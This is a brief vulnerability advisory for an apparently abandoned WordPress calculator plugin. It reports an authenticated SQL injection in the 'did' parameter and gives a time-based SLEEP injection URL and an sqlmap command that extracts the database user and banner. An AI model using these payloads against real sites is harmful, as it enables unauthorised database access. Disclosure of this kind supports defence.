The plugin does not sanitize user input into the ‘did’ parameter and uses it in a SQL statement, leading to an authenticated SQL Injection vulnerability. Plugin author closed the plugin.
http://www.example.com/wp-admin/admin.php?page=wpcalc&info=del&did=1 AND (SELECT 7156 FROM (SELECT(SLEEP(5)))MIkl)
or, using the sqlmap tool:
./sqlmap.py -r request.txt -dbms=mysql --current-user -b -p did --batch --flush-session